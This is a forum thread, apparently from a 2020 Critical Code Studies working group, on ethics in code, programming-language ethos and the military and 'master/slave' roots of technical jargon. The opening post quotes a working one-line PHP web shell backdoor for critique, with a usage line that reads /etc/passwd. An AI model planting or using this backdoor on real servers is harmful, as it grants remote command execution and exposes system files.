Participants: Derya Akbaba * Ben Allen * Natalia-Rozalia Avlona * Kirill Azernyi * Erin Kathleen Bahl * Natasha Bajc * Lucas Bang * Tully Barnett * Ivette Bayo * Eamonn Bell * John Bell * kiki benzon * Liat Berdugo * Kathi Berens * David Berry * Jeffrey Binder * Philip Borenstein * Gregory Bringman * Sophia Brueckner * Iris Bull * Zara Burton * Evan Buswell * Ashleigh Cassemere-Stanfield * Brooke Cheng* Alm Chung * Jordan Clapper * Lia Coleman * Imani Cooper * David Cuartielles * Edward de Jong * Pierre Depaz * James Dobson * Quinn Dombrowski * Amanda Du Preez * Tristan Espinoza * Emily Esten * Meredith Finkelstein * Caitlin Fisher * Luke Fischbeck * Leonardo Flores * Laura Foster * Federica Frabetti * Jorge Franco * Dargan Frierson * Arianna Gass * Marshall Gillson * Jan Grant * Rosi Grillmair * Ben Grosser * E.L. (Eloisa) Guerrero * Yan Guo * Saksham Gupta * Juan Gutierrez * Gottfried Haider * Nabil Hassein * Chengbo He * Brian Heim * Alexis Herrera * Paul Hertz * shawné michaelain holloway * Stefka Hristova * Simon Hutchinson * Mai Ibrahim * Bryce Jackson * Matt James * Joey Jones * Masood Kamandy * Steve Klabnik * Goda Klumbyte * Rebecca Koeser * achim koh * Julia Kott * James Larkby-Lahet * Milton Laufer * Ryan Leach * Clarissa Lee * Zizi Li * Lilian Liang * Keara Lightning * Chris Lindgren * Xiao Liu * Paloma Lopez * Tina Lumbis * Ana Malagon * Allie Martin * Angelica Martinez * Alex McLean * Chandler McWilliams * Sedaghat Payam Mehdy * Chelsea Miya * Uttamasha Monjoree * Nick Montfort * Stephanie Morillo * Ronald Morrison * Anna Nacher * Maxwell Neely-Cohen * Gutierrez Nicholaus * David Nunez * Jooyoung Oh * Mace Ojala * Alexi Orchard * Steven Oscherwitz * Bomani Oseni McClendon * Kirsten Ostherr * Julia Polyck-O'Neill * Andrew Plotkin * Preeti Raghunath * Nupoor Ranade * Neha Ravella * Amit Ray * David Rieder * Omar Rizwan * Barry Rountree * Jamal Russell * Andy Rutkowski * samara sallam * Mark Sample * Zehra Sayed * Kalila Shapiro * Renee Shelby * Po-Jen Shih * Nick Silcox * Patricia Silva * Lyle Skains * Winnie Soon * Claire Stanford * Samara Hayley Steele * Morillo Stephanie * Brasanac Tea * Denise Thwaites * Yiyu Tian * Lesia Tkacz * Fereshteh Toosi * Alejandra Trejo Rodriguez * Álvaro Triana * Job van der Zwan * Frances Van Scoy * Dan Verständig * Roshan Vid * Yohanna Waliya * Sam Walkow * Kuan Wang * Laurie Waxman * Jacque Wernimont * Jessica Westbrook * Zach Whalen * Shelby Wilson * Avery J. Wiscomb * Grant Wythoff * Cy X * Hamed Yaghoobian * Katherine Ye * Jia Yu * Nikoleta Zampaki * Bret Zawilski * Jared Zeiders * Kevin Zhang * Jessica Zhou * Shuxuan Zhou

Guests: Kayla Adams * Sophia Beall * Daisy Bell * Hope Carpenter * Dimitrios Chavouzis * Esha Chekuri * Tucker Craig * Alec Fisher * Abigail Floyd * Thomas Forman * Emily Fuesler * Luke Greenwood * Jose Guaraco * Angelina Gurrola * Chandler Guzman * Max Li * Dede Louis * Caroline Macaulay * Natasha Mandi * Joseph Masters * Madeleine Page * Mahira Raihan * Emily Redler * Samuel Slattery * Lucy Smith * Tim Smith * Danielle Takahashi * Jarman Taylor * Alto Tutar * Savanna Vest * Ariana Wasret * Kristin Wong * Helen Yang * Katherine Yang * Renee Ye * Kris Yuan * Mei Zhang
Coordinated by Mark Marino (USC), Jeremy Douglass (UCSB), and Zach Mann (USC). Sponsored by the Humanities and Critical Code Studies Lab (USC), and the Digital Arts and Humanities Commons (UCSB).

Code Critique: Boundaries of Ethical Code and Coding

In thinking about ethics and code, we might first consider the different focuses of moral philosophy (meta-ethics, normative ethics, and applied ethics), traversing truth-value determination, Jeremy Bentham's and John Stuart Mill's arguments for utilitarianism, Immanuel Kant's deontological declarations, or the application of information, digital, technology, or code ethics.

One consideration of ethical coding is the authorial intentionality of the code. Was the code written to add or remove functionality? Did a change correct logical or assumption flaws that caused unintentional outcomes, that is, bug fixes? Was it modified to safeguard against potential security threats? Was something changed to purposely usurp control from unwitting consumers of the code, creating a backdoor?

As Kevin Brock highlights in Rhetorical Code Studies, the code fix for Heartbleed, a security vulnerability in the OpenSSL software, was simple yet overlooked through multiple code contributions to the open-source project. The fix added a few lines of code performing two checks, comparing the amount of data actually received against the amount a request claimed, to prevent bad actors from reading data not intended for them. Brock adds that activities around the security flaw “can and do…exert tremendous influence over how individuals and communities respond to and deal with the consequences of writing code” (10).
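
The actual patch is a few lines of C in OpenSSL's TLS heartbeat handler; purely as a schematic sketch of the idea (the names are hypothetical, and the language is PHP rather than C, to match the backdoor example below), the two checks amount to something like:

    <?php
    // Schematic sketch only: the real Heartbleed fix is C code in OpenSSL's
    // heartbeat handler. The function and variable names here are hypothetical.
    function handle_heartbeat(string $record, int $claimed_length): ?string {
        if (strlen($record) === 0) {
            return null; // check 1: silently discard zero-length records
        }
        if ($claimed_length > strlen($record)) {
            return null; // check 2: never echo back more bytes than were received
        }
        return substr($record, 0, $claimed_length); // echo only what was sent
    }
    ?>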

Borrowing from Stuart Power's simple one-line PHP backdoor example from GitHub, reproduced here:

    <!-- Simple PHP Backdoor By DK (One-Liner Version) -->
    <!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
    <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

We might be quick to assess the applied ethical intention of this code as immoral, or evil to some degree. While exploiting it requires a permissively configured server, and the usage example assumes a UNIX-like operating system, the code provides a rudimentary method for running arbitrary system commands by visiting the URL where the code is hosted.
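
By contrast, even a minimal gesture toward restraint changes the ethical posture of such code. As a hypothetical sketch (not an endorsement of exposing remote command execution at all), the same mechanism behind an explicit allow-list might look like this:

    <?php
    // Hypothetical contrast to the backdoor above: the same mechanism,
    // restricted to an explicit allow-list of harmless, read-only commands.
    $allowed = ['date', 'uptime', 'whoami'];
    if (isset($_REQUEST['cmd']) && in_array($_REQUEST['cmd'], $allowed, true)) {
        echo "<pre>";
        system($_REQUEST['cmd']); // only ever one of the three commands above
        echo "</pre>";
        die;
    }
    ?>

The difference between the two is not syntactic sophistication but intent made legible in the code itself.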

Other, lengthier examples of overtly unethical code exist; however, examining less obvious coding approaches, such as code and code bases in common use, as Brock highlights with OpenSSL, might lead to better design and development practices for projects with “good” intentions.

Some questions that come to mind in code examination as well as in the practice of code design and development are:

  • At what stages of design and development do we confront ethical decisions and to what scale?
  • In Ethical Programs: Hospitality and the Rhetorics of Software, James Brown states, regarding ethical predicaments and decision-making in code, “these steps are not necessarily arrived at rationally, and they are not always the result of deliberation” (5). How might we examine code or a code base, reflectively, to identify pivotal moments of ethical predicament?
  • What might be some guiding principles towards more ethical coding practices?
  • Thinking of the one-line code example, at what threshold does code transform into algorithm or agent/actor with ethical intentionality? Does it take only one line of code?
  • Regarding environmental ethics, can code be ethical or unethical based on its level of resource and power consumption? Can we write code to be more environmentally friendly?

Works Cited

Brock, Kevin. Rhetorical Code Studies: Discovering Arguments in and around Code. University of Michigan Press, 2019.
Brown, James J. Ethical Programs: Hospitality and the Rhetorics of Software. University of Michigan Press, 2015.

Comments

  • edited February 2020

    @brycejackson said:

    • At what stages of design and development do we confront ethical decisions and to what scale?

    Great question. "At every stage" might be too easy an answer. However, it strikes me that "before it begins" could be helpful.

    In the design and development of code, even when one chooses a language -- possibly before the first "authorial" line of code is intentionally written -- one is also choosing ethical frameworks. This is not to say that a language is ethical or unethical in itself: the same programming language might be used to code either robotic surgical arms or criminal ransomware. However, code language designs and their concerns are often articulated as a kind of ethics by their designers, advocates, and practitioners. Choosing a language to develop code might mean joining a community with a shared ethos ("is it Pythonic?"), but it also means assuming a framework of ethical decisions that are part of the language design itself, in which certain things are valued over others. To pick a few examples:

    From the Python homepage, a kind of pitch/poem:

    Python is powerful... and fast;
    plays well with others;
    runs everywhere;
    is friendly & easy to learn;
    is Open.

    From the Rust homepage:

    Rust is blazingly fast and memory-efficient:
    with no runtime or garbage collector,
    it can power performance-critical services,
    run on embedded devices,
    and easily integrate with other languages.

    From the Ruby homepage

    A dynamic, open source programming language
    with a focus on simplicity and productivity.
    It has an elegant syntax
    that is natural to read and easy to write.

    From the Java home page:

    Java Powers Our Digital World

    Java is at the heart of our digital lifestyle.
    It's the platform for launching careers,
    exploring human-to-digital interfaces,
    architecting the world's best applications,
    and unlocking innovation everywhere—
    from garages to global organizations.

    ...and, for the example above:

    From the PHP homepage:

    PHP is a popular general-purpose scripting language
    that is especially suited to web development.
    Fast, flexible and pragmatic,
    PHP powers everything from your blog
    to the most popular websites in the world.

    Different programming languages (and language families / lineages / traditions), not just in their pitch materials but in their conception and evolution, often address ethical framing questions such as: Who are we? What does it mean to be a good programming language? How is good software made, what does it look like, and what can it do? What is bad code and bad programming? What should software never do?

    In Java, this means that you can mark a method with a stack of access and other modifiers such as private static final synchronized native void myMethod() because access control, permissions, and guarantees are extremely important to the "belt and suspenders" way that Java frames good code and good coding. From that point of view, many other languages are "unethical" by design -- although, from a Python point of view, private as a language feature might itself be in some sense "unethical" (e.g. not "Open").

  • edited February 2020

    @jeremydouglass I'd like to add another perspective.

    Jeremy Douglass wrote: Different programming languages (and language families / lineages / traditions), not just in their pitch materials but in their conception and evolution, often address ethical framing questions such as: Who are we? What does it mean to be a good programming language? How is good software made, what does it look like, and what can it do? What is bad code and bad programming? What should software never do?

    I don't see any ethical concerns addressed in any of the homepage pitches you shared. Which, by the way, were fascinating to read! But these pitches address competitive positioning, or branding. I don't see any of the pitches addressing how each language relates to issues of ethics.

    But how could a specific language be ethical by itself?
    Are there examples of languages that don't do certain expected/standard functions due to an ethical choice of the programmer? Because all code is exploitable, just like every human resource, aren't the ethical dimensions bigger than any code itself?

    I don't see code, or any of its implementations, or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying), as requiring any governance that a human life would not. I don't see code requiring a separate moral compass, because I see code and its implementations as already embedded in any social fabric at any given time. Our ethics evolve.

    But the questions that cultures use to guide shared social contracts (do not kill, do not steal, do not violate, generosity, reciprocity, equity in redistribution, participatory decision-making, social accountability, personal responsibility) are the same questions that I would like code implementations to answer to as well.

    And I agree, every stage beginning with the problem-solving stage needs the momentum of these questions, not just implementation.

    Are these basic principles enough to navigate the nuances of our social competencies and literacies through code?

  • edited February 2020

    @patricia_s said:
    But how could a specific language be ethical by itself?
    Are there examples of languages that don't do certain functions due to an ethical choice of the programmer?

    Well, this question has been answered on another thread: Floodnet: Deliberate Error as Protest and Performance.
    See: List of Protected Domains.

  • or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying)

    That's a startling observation! I've been exposed to this term for most of my working life. If you'd asked me, I probably would've guessed that it was originally an Americanism - but it never occurred to me that it might have such macho, militaristic connotations. It was "just another piece of jargon".

    (Having said that, I fall into the camp that is hugely sympathetic to the sensitivities around other pieces of jargon - in particular, the "master/slave" distinction; it seems to me a good thing that alternative terminology is gaining traction.)

    All of which is by the by. I don't see it mentioned in previous iterations of this WG, but there's at least one toy that you might interpret as having an alternative ethical stance. Core War has a long history; it's not only grown its own language to describe strategies for competing programs ("Paper, Scissors, Stone," for instance) but it's also seen some success as a playground for program synthesis through genetic algorithms.

  • or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying)

    That's a startling observation! I've been exposed to this term for most of my working life. If you'd asked me, I probably would've guessed that it was originally an Americanism - but it never occurred to me that it might have such macho, militaristic connotations. It was "just another piece of jargon".

    (Having said that, I fall into the camp that is hugely sympathetic to the sensitivities around other pieces of jargon - in particular, the "master/slave" distinction; it seems to me a good thing that alternative terminology is gaining traction.)

    All of which is by the by. Your comment reminded me of this: I don't see it mentioned in previous iterations of this WG, but there's at least one toy that you might interpret as having an alternative ethical stance (albeit as a playground). Core War has a long history; it's not only grown its own language to describe strategies for competing programs ("Paper, Scissors, Stone," for instance) but it also saw some success as an arena for program synthesis through genetic algorithms.

  • edited February 2020

    @jang said:

    or "deployments" (as corporate teams say, using a military term with a casualness I find horrifying)

    That's a startling observation! I've been exposed to this term for most of my working life. If you'd asked me, I probably would've guessed that it was originally an Americanism - but it never occurred to me that it might have such macho, militaristic connotations. It was "just another piece of jargon".

    Hi @jang! It very well may be an Americanism. I don't know where or when people began using that term in the web world. I may have been predisposed to be appalled by the term, not just due to political tendencies (anti-war), but because English is not my first language, so words like that really stand out, ESPECIALLY in a "creative" environment where one isn't expecting a military slippage. Yet it's everywhere. The industries in which I've worked the most have been based around deprecated military technologies: tech, and the methodologies of digital production for photo and video.

    I don't know if it's still the case, but the only free special-effects packs we could get for After Effects, which used to come bundled with the software, were the Casino Pack and one for a war game. But it's equally telling about the intent behind the frameworks we use to make.

    How are we to think differently (as Apple posters originally impelled us to do) when we are "deploying" through these frameworks, coated with the residue of oppressive force? The frameworks we use affect our ideas so intimately, but without us thinking too much about it because, well, "that's the software".

  • edited February 2020

    So I have a question about this.

    I'd assumed that "deploy" came from the French word meaning to unfold or to spread out, and that if anything the direction of semantic travel would have been from a general notion of laying out or spreading out, to one involving military forces - but it may well be that the meaning traveled in the opposite direction. Another way to put it is that my linguistic intuitions are that we start with general meanings, and jargon (military, technical, artistic, critical) tends to find and then apply analogues.

    That may or may not be the case here; but if the speaker assumed as I did, that the terminology was originally innocent - then to what extent are they affected by such connotations, of which they are naive?

    I understand that "offense is taken, rather than given" (ie, the speaker has limited control over how a listener may interpret or be emotionally moved by their words) - and I'm not attempting to undermine that position.

    Is it the case that militaristic connotations might be "filed off" terminology, given time and the dilution of usage? (Some things - the "master/slave" terminology - are clearly still burdened with their original connotations, and to continue to insist on their use seems deliberately obtuse and mean; and that I don't dispute.) Or am I displaying a kind of colonial chauvinism in even asking this question?

    (Although I am broadly aware of the ideas of linguistic feminism - and I try to choose my words carefully - I would not describe myself as expert in them. I suppose I'm also asking if there is someone I should be reading to get better acquainted with these ideas.)

    To bring the question back to the term "deployment" in particular - I am reasonably sure that I think of the act of software deployment in the abstract, as navigating a directed graph of state changes. Is it foolish to be so convinced of my naivete?

  • RE: "deploy"

    The Online Etymology Dictionary has "deploy" coming into English from French as a military word in 1786 (I did not know that!) but also says: "Figurative use by 1829." That is almost two hundred years of figurative uses to muddy the waters.

    An interesting point of comparison is this working group's discussion of Master/Slave Replication in MySQL. "Slave" as a term in technical discourse has a longer history than MySQL, but it is much younger than "deploy": its first use in that sense can be traced back to the sympathetic clocks ("master / slave clocks") run by the British Royal Astronomers in Cape Town, South Africa, first so called in 1904. However, for many, no history of figurative use, no matter how long, could make the word "slave" lose its sting as connected to British and American / US slavery practices. Perhaps because I'm attuned to the US context (first learning to program as a child in Atlanta, Georgia), the critique of "slave database" terminology was immediately intuitive to me.

    That said, there is a great deal of language about commanding, coordinating, and ordering-about that comes from military concepts and usage -- or the language is at least military-adjacent, even if that is not the original etymology. In data marshalling, for example, one metaphorically commands data to form up, not unlike a regiment in ranks and files. Even less ambiguous is the common networking term for a perimeter network to a LAN, a "DMZ" ("demilitarized zone").

    Another networking term is "ping." "Ping" is originally a 19th-century onomatopoeia for a bullet sound, and in the early 20th century it became the word for sound pulses made by active sonar, which was developed for military submarines. The first use of "ping" in a US patent describes it in a warfare context:

    Submarines may also be equipped with echo-ranging equipment which consists of an apparatus for sending sound pulses, or pings, into the water and for determining the time required for their echoes to return from the target. But, in warfare it is undesirable for a submarine to send out echo-ranging pings because they may be heard by other ships. ("Sonar Trainer," US2948970A: https://patents.google.com/patent/US2948970A/en)

    Just because a word (like "ping") emerges out of a particular history does not mean that all usages of it are aware of that history or that they convey that history to listeners. A computer scientist or gamer talking about pings is not thereby pushing a military ideology. However, sometimes on examination we find sets of jargon that, while innocent in context, reveal a systematic pattern of parallel usage (marshalling, pings, DMZs, etc. as military language), conveying a general set of military metaphors for thinking about, for example, data or networks; these would be understandable as subtext to new listeners already familiar with parades or submarines. New military technical metaphors, when coined, then tend to fit in with that pattern of existing language.

  • edited February 2020

    To come back to the original question list for a moment:

    • Regarding environmental ethics, can code be ethical or unethical based on its level of resource and power consumption? Can we write code to be more environmentally friendly?

    If software engineers / coders attempted to make code more power-efficient in general, and if lowered energy consumption led to lowered environmental impact in general, then this could be ethical. The impacts of improved software are complicated, though -- sometimes optimized software runs on new lower-energy devices, and those new devices are sold to people who then throw their slightly less energy-efficient devices into a landfill -- so the net effect could be positive, or a broad push to upgrade to more efficient software could trigger a wave of unnecessary pollution. Sometimes it is a mix of the two.

    One might accrue great positive karma by slightly optimizing the performance of a broadly deployed random number generator, thus averting some huge amount of coal-fired electrical consumption worldwide. Or, conversely, not bothering to optimize a sloppy background process for a widely deployed cellphone might be deeply unethical, because this wasteful act is magnified across the huge number of unnecessary recharges it triggers around the globe.
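
    As a toy illustration (the functions are hypothetical, in PHP only because that is the language of the code critique in the original post), the difference between a busy-wait and a sleep is exactly this kind of small, globally magnified choice:

        <?php
        // Toy illustration: two ways for a background process to wait for a
        // file to appear. Both work; their energy footprints differ greatly.
        function wait_busy(string $path): void {
            while (!file_exists($path)) {
                clearstatcache(true, $path); // PHP caches stat() results
                // no sleep: spins the CPU at full speed the whole time it waits
            }
        }
        function wait_polite(string $path): void {
            while (!file_exists($path)) {
                clearstatcache(true, $path);
                usleep(250000); // sleep 0.25 s between checks; the CPU idles
            }
        }
        ?>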

    Bitcoin mining, with its power-consumption footprint, is in this sense perhaps the closest thing to a caricature of the unethical in computing. When I first heard it described in detail, it reminded me of a scene from Douglas Adams' "The Restaurant at the End of the Universe" (1980), in which the first space colonists to arrive on Earth immediately decide to destroy the planet in order to create imaginary wealth:

    “Since we decided a few weeks ago to adopt the leaf as legal tender, we have, of course, all become immensely rich.”

    Ford stared in disbelief at the crowd who were murmuring appreciatively at this and greedily fingering the wads of leaves with which their track suits were stuffed.

    “But we have also,” continued the management consultant, “run into a small inflation problem on account of the high level of leaf availability, which means that, I gather, the current going rate has something like three deciduous forests buying one ship’s peanut."

    Murmurs of alarm came from the crowd. The management consultant waved them down.

    “So in order to obviate this problem,” he continued, “and effectively revalue the leaf, we are about to embark on a massive defoliation campaign, and. . .er, burn down all the forests. I think you'll all agree that's a sensible move under the circumstances."

    The crowd seemed a little uncertain about this for a second or two until someone pointed out how much this would increase the value of the leaves in their pockets whereupon they let out whoops of delight and gave the management consultant a standing ovation.

  • edited February 2020

    Thanks @jeremydouglass!

    I've been following the discussion on the Master/Slave Replication in MySQL thread, but have not posted because I don't want to be off-topic. MySQL is not my expertise, but I do wonder whether 'replication' in a database is relegated to a perpetuity clause. The examples I keep thinking of don't have an automated perpetuity factor, for example:

    QuarkXPress stylesheets designated a "Master Style" by default for typefaces. When Adobe InDesign displaced QuarkXPress, the language remained, but evolved: now the defaults are "paragraph" and "body" and other choices. In QuarkXPress 3.0 I remember being able to create new stylesheets and to name them (captions, biblio, etc.), but I wonder whether that was possible before then.

    Interestingly, with Photoshop: layers weren't available until Photoshop 2.0, and then still in black and white. But there wasn't a "master layer"; there was only "background." The default organization of the working space was modeled more closely on painting: the background is white, canvas, plain.

    When I first learned CSS, the instructor said "Master style" for what I later saw my colleagues call "main.css" instead.

    The same idea applies to learning lighting in photography departments. When you graduate to using strobe lights, there is a master (the main light) and a slave (the fill, or any other designated role).

    And then there are our cars: the "Master Cylinder" and "Clutch Slaves," which are stepped on (in a manual transmission; I'm not sure if this language applies to automatic cars. My dad was/is a mechanic, so I heard these things; I never worked on cars.)

    The "Master" bedroom.

    Once we hear "master," the analogy completes itself.

  • edited February 2020

    @jang said:

    To bring the question back to the term "deployment" in particular - I am reasonably sure that I think of the act of software deployment in the abstract, as navigating a directed graph of state changes. Is it foolish to be so convinced of my naivete?

    Where you say 'naivete' I would say 'socialized.'
    We're socialized to accept certain conditions as default positions.

    The default human measurements for safety systems (for example, seat belts in cars, airplanes, etc.) are still based on the measurements of an athletic, able-bodied white male, resulting in ergonomic inequities that lead to increased fatalities among drivers who were assigned female at birth.

    We're socialized to accept 'defaults.'
    The naivete you mention is bigger than any single individual, in my opinion.
    But each individual has the agency to change defaults.


    The Crash Test Bias: How Male-Focused Testing Puts Female Drivers at Risk
    https://www.consumerreports.org/car-safety/crash-test-bias-how-male-focused-testing-puts-female-drivers-at-risk/
